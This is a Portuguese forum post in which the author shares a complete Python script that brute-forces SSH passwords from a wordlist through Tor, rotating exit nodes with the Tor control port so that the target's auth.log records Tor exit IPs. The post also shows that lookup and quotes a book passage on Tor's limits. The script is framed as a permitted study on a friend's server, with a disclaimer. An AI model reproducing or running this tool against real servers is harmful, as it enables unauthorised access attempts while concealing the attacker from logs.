Ir para conteúdo

Força Bruta SSH "TENTANDO" o anonimato


Visitante gnoo

Posts Recomendados

Saudações,

estava eu a ler um livro para criar um scraper... já agora o livro é este:

transferir.jpeg.87660627b6f8fd85de5f4d9a16b46071.jpeg

 quando quase no fim do livro falava sobre uma biblioteca do python - pysocks, para obter algum anonimato durante a execução de programas onde são feitas requisições para a rede, eu como ainda não tinha mexido com proxys, pelo menos da forma que vou exemplificar de seguida, larguei tudo e fui procurar informação sobre o assunto... não é dificil encontrar, com algumas bases programação consegue perceber bem como a biblioteca pysocks funciona, e o seu uso é relativamente fácil. 

Comecei a montar um código, mas tinha a sensação que aquilo não cumpria a sua função, ficava um pouco inquieto ao pensar que podia estar a realizar "alegadamente" testes em redes reais, e ser o meu IP que ficava lá e não do proxy.

Entretanto pedi a um amigo meu que é sysadmin para montar um servidor numa outra cidade bem longe de mim para eu poder administrar e com permissão para realizar todos os testes que eu bem entender e para que o cenário fosse o mais real possível, porque ver na prática como as coisas funcionam é outra coisa.

E assim foi, ele montou o servidor eu montei o código e iniciei os testes... 

O processo em si avaliado do ponto de vista técnico é extremamente básico, até porque o objectivo não era a invasão do servidor mas sim perceber qual o registo que fica do lado de lá quando é feito um brute force usando o serviço do TOR.

 

A conversa do costume, não é:

O CONTEÚDO QUE  SEGUE É APENAS E SÓÓÓÓÓÓ PARA ESTUDO, ESTE TIPO DE PRÁTICAS FEITAS SEM AUTORIZAÇÃO É CRIME.....

 

bitch-please-67p1zo.thumb.jpg.74c81b84d748d6fc3eb2aba4ccb98c73.jpg  

 

O código que segue não eficiente especialmente para grandes dicionários, como já disse o objectivo não é a invasão em si mas o comportamento do servidor, e perceber se realmente o teu ip não fica registado no auth.log do sistema.

import socks
import socket
import paramiko


host ='<IP>'
porto = 
username = '<user>'


lista_passwords = open("passwords.txt","r")
passwords = lista_passwords.readlines()

def conexao_tor():
    socks.set_default_proxy(socks.PROXY_TYPE_SOCKS5, "localhost", 9050, True)
    socket.socket = socks.socksocket
    print("Conectado ao \033[5;92m\u25CF\033[00mTor SOCK5 \033[1;32m(serviço ativo)\033[00m")


def conexao_ssh():
    for password in passwords:
        try:
            ssh =paramiko.SSHClient()
            ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
            print("A testar Password: %s" % password, end = '')
            ssh.connect(host,porto,username,password.strip())
            sessao = ssh.get_transport().open_session()
            if sessao.active:
                print("\033[5;92m[+]Password encontrada:\033[00m %s" % password)
        except Exception as erro:
            pass
            
    print("Operação terminada!")  

def nova_identidade():
    socks.setdefaultproxy()

    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect(("127.0.0.1", 9051))
    sock.send(b"AUTHENTICATE\r\n")
    resposta = sock.recv(1024)

    if b"250" in resposta:
        sock.send(b"SIGNAL NEWNYM\r\n")
        print("\033[1;33mNova identidade atribuida...%s\033[00m\n" %resposta.decode(),)
    sock.close()

    conexao_tor()

def main():
    conexao_tor()
    conexao_ssh()
    nova_identidade()
    conexao_ssh()


if __name__ == '__main__':
    main()

 

Depois de executar o código fui ao ficheiro auth.log e realmente o IP que lá estava não era o meu... 

E nessa altura senti-me grande :P...

 

Os resultados foram:

1357379673_Capturadeecr_2018-05-29_23-24-55.png.72316b62ea0122f6cf45324b32583a9f.png

 

Dois IP's diferentes que não são meus... e dois ips porquê??   Se leram o código e sabem o que está ali eu repeti a operação duas vezes, mas antes de iniciar o segundo round mudei de identidade... ah pois ééééé da para mudar identidade :D ...ou seja imagino que seja feito um redireccionamento para outro nó de saída do TOR.

Mas tinha que confirmar se realmente seriam nós de saída do TOR e foi a esta página (acreditando que a informação é fiavel):

 https://check.torproject.org/cgi-bin/TorBulkExitList.py?ip=1.1.1.1

 

E confirma são dois nós de saída do TOR

110050148_Capturadeecr_2018-05-30_00-28-36.thumb.png.9860f55244712aaf466912a4e59cce61.png  

354536590_Capturadeecr_2018-05-30_00-30-40.png.e126832d2f1d5fba7708c2da2c9622f2.png

 

 

NOTA: Mas como isto não são tudo rosas o autor do livro deixa alguns avisos que devem ser levados em consideração....

 

751625017_Capturadeecr_2018-05-30_00-32-51.png.c6fef1fe11b11b9b7fd0fb8d0774def4.png

 

 

Tradução do Google Tradutor ( Limitei-me a fazer Copy / Paste como devem calcular o português não é o mais correto):

 

Citar

Embora a razão de estarmos usando o Tor neste livro seja mudar nosso
Endereço IP, não alcançar o anonimato completo per se, vale a pena
um momento para abordar algumas das forças e limitações do
A capacidade do Tor de anonimizar o tráfego.
Embora você possa supor ao usar o Tor que o endereço IP que você
estão vindo, de acordo com um servidor web, não é um endereço IP
que pode ser rastreada até você, qualquer informação que você compartilhe com
servidor web pode expor você. Por exemplo, se você entrar no seu
conta própria do Gmail e, em seguida, fazer pesquisas incriminatórias no Google,
essas pesquisas agora podem ser vinculadas à sua identidade.
Além do óbvio, no entanto, até mesmo o ato de entrar no Tor
pode ser perigoso para o seu anonimato. Em dezembro de 2013, uma
estudante de graduação vard, na tentativa de sair da final
exames, enviou uma ameaça de bomba para a escola através da rede Tor
trabalho, usando uma conta de e-mail anônima. Quando o Harvard IT
equipe olhou para seus logs, eles encontraram o tráfego indo para o Tor
rede de uma única máquina, registrada em um local conhecido
durante o tempo em que a ameaça de bomba foi enviada. Embora eles
não conseguiu identificar o eventual destino deste tráfego (apenas
foi enviado através do Tor), o fato de que os tempos combinaram e lá
foi apenas uma única máquina logada no momento foi condenável
o suficiente para processar o aluno.
Entrar no Tor não é um manto automático de invisibilidade, nem
dar-lhe livre reinado para fazer o que quiser na Internet. Apesar disso
é uma ferramenta útil, certifique-se de usá-la com cautela, inteligência e
Claro, moralidade.

 

 

Cumprimentos...

Link para o comentário
Compartilhar em outros sites

Arquivado

Este tópico foi arquivado e está fechado para novas respostas.

  • Quem Está Navegando   0 membros estão online

    • Nenhum usuário registrado visualizando esta página.
×
×
  • Criar Novo...